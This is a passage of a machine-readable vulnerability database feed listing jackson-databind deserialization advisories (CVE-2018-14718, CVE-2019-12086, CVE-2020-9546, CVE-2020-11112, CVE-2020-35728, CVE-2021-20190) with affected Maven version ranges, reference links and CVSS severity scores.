"url": "https://github.com/FasterXML/jackson-databind/commit/3cc52f82ecf943e06c1d7c3b078e405fb3923d2b" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/8238ab41d0350fb915797c89d46777b4496b74fd" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/b3587924ee5d8695942f364d0d404d48d0ea6126" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.12" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.13" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/05/msg00001.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00035.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220506-0004" }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5283" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" } ], "database_specific": { "cwe_ids": [ "CWE-787" ], "github_reviewed": true, "github_reviewed_at": "2022-03-22T14:36:44Z", "nvd_published_at": "2022-03-11T07:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-58pp-9c76-5625", "published": "2020-06-10T21:12:41Z", "modified": "2024-02-16T07:55:08.550842Z", "aliases": [ "CVE-2020-11112" ], "summary": "jackson-databind mishandles the interaction between serialization gadgets and typing", "details": "FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.proxy.provider.remoting.RmiProvider (aka apache/commons-proxy).", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10.4" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-58pp-9c76-5625/GHSA-58pp-9c76-5625.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11112" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2666" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200403-0002" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-10T21:11:14Z", "nvd_published_at": "2020-03-31T05:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-5949-rw7g-wx7w", "published": "2021-01-20T21:20:15Z", "modified": "2025-09-15T07:42:14.888352Z", "aliases": [ "BIT-nifi-2021-20190", "CVE-2021-20190" ], "summary": "Deserialization of untrusted data in jackson-databind", "details": "A flaw was found in jackson-databind before 2.9.10.7 and 2.6.7.5. FasterXML mishandles the interaction between serialization gadgets and typing. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.9.10.7" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.10.6", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/01/GHSA-5949-rw7g-wx7w/GHSA-5949-rw7g-wx7w.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.6.7.5" } ] } ], "versions": [ "2.0.0", "2.0.0-RC1", "2.0.0-RC2", "2.0.0-RC3", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/01/GHSA-5949-rw7g-wx7w/GHSA-5949-rw7g-wx7w.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-20190" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2854" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/08fbfacf89a4a4c026a6227a1b470ab7a13e2e88" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/7dbf51bf78d157098074a20bd9da39bd48c18e4a" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1916633" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r380e9257bacb8551ee6fcf2c59890ae9477b2c78e553fa9ea08e9d9a@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210219-0008" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2021-01-20T04:44:51Z", "nvd_published_at": "2021-01-19T17:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-5p34-5m6p-p58g", "published": "2020-04-23T21:08:40Z", "modified": "2024-03-14T05:17:58.624150Z", "aliases": [ "CVE-2020-9546" ], "summary": "jackson-databind mishandles the interaction between serialization gadgets and typing", "details": "FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig (aka shaded hikari-config).", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10.4" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-5p34-5m6p-p58g/GHSA-5p34-5m6p-p58g.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-9546" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2631" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200904-0006" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00008.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdd4df698d5d8e635144d2994922bf0842e933809eae259521f3b5097@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdd49ab9565bec436a896bc00c4b9fc9dce1598e106c318524fbdfec6@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd5a4457be4623038c3989294429bc063eec433a2e55995d81591e2ca@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb6fecb5e96a6d61e175ff49f33f2713798dd05cf03067c169d195596@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r98c9b6e4c9e17792e2cd1ec3e4aa20b61a791939046d3f10888176bb@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9464a40d25c3ba1a55622db72f113eb494a889656962d098c70c5bb1@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r893a0104e50c1c2559eb9a5812add28ae8c3e5f43712947a9847ec18@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r35d30db00440ef63b791c4b7f7acb036e14d4a23afa2a249cb66c0fd@%3Cissues.zookeeper.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-04-23T19:26:40Z", "nvd_published_at": "2020-03-02T04:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-5r5r-6hpj-8gg9", "published": "2021-12-09T19:15:24Z", "modified": "2024-02-18T05:42:28.539166Z", "aliases": [ "CVE-2020-35728" ], "summary": "Serialization gadget exploit in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool (aka embedded Xalan in org.glassfish.web/javax.servlet.jsp.jstl).", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.9.10.8" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.10.6", "2.9.10.7", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.7", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-5r5r-6hpj-8gg9/GHSA-5r5r-6hpj-8gg9.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-35728" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2999" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/1ca0388c2fb37ac6a06f1c188ae89c41e3e15e84" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210129-0007" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2021-04-07T22:24:20Z", "nvd_published_at": "2020-12-27T05:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-5ww9-j83m-q7qx", "published": "2019-05-23T09:32:24Z", "modified": "2024-03-15T01:17:50.016820Z", "aliases": [ "CVE-2019-12086" ], "summary": "Information exposure in FasterXML jackson-databind", "details": "A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint, the service has the mysql-connector-java jar (8.0.14 or earlier) in the classpath, and an attacker can host a crafted MySQL server reachable by the victim, an attacker can send a crafted JSON message that allows them to read arbitrary local files on the server. This occurs because of missing com.mysql.cj.jdbc.admin.MiniAdmin validation.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.9" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/05/GHSA-5ww9-j83m-q7qx/GHSA-5ww9-j83m-q7qx.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11.4" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/05/GHSA-5ww9-j83m-q7qx/GHSA-5ww9-j83m-q7qx.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.7.9.6" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/05/GHSA-5ww9-j83m-q7qx/GHSA-5ww9-j83m-q7qx.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.6.7.3" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/05/GHSA-5ww9-j83m-q7qx/GHSA-5ww9-j83m-q7qx.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-12086" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2326" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/efc3c0d02f4743dbaa6d1b9c466772a2f13d966b" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/dda513bd7251b4f32b7b60b1c13740e3b5a43024" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/d30f036208ab1c60bd5ce429cb4f7f1a3e5682e8" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rda99599896c3667f2cc9e9d34c7b6ef5d2bbed1f4801e1d75a2b0679@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/05/msg00030.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OVRZDN2T6AZ6DJCZJ3VSIQIVHBVMVWBL" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXRVXNRFHJSQWFHPRJQRI5UPMZ63B544" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UKUALE2TUCKEKOHE2D342PQXN4MWCSLC" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/May/68" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190530-0003" }, { "type": "WEB", "url": "https://web.archive.org/web/20200227030031/http://www.securityfocus.com/bid/109227" }, { "type": "WEB", "url": "https://web.archive.org/web/20200808181049/http://russiansecurity.expert/2016/04/20/mysql-connect-file-read" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4452" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2935" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2936" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2937" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2938" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2998" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3044" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3045" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3046" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3050" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3200" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.9" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3f99ae8dcdbd69438cb733d745ee3ad5e852068490719a66509b4592@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88cd25375805950ae7337e669b0cb0eeda98b9604c1b8d806dccbad2@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5@%3Csolr-user.lucene.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2019-05-22T04:34:56Z", "nvd_published_at": "2019-05-17T17:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-645p-88qh-w398", "published": "2019-01-04T19:06:55Z", "modified": "2024-03-16T05:19:17.936174Z", "aliases": [ "CVE-2018-14718" ], "summary": "Arbitrary Code Execution in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.9.7, 2.8.11.3, 2.7.9.5, and 2.6.7.3 might allow remote attackers to execute arbitrary code by leveraging failure to block the slf4j-ext class from polymorphic deserialization.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.7" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-645p-88qh-w398/GHSA-645p-88qh-w398.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11.3" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.8.11.2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-645p-88qh-w398/GHSA-645p-88qh-w398.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.7.9.5" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", 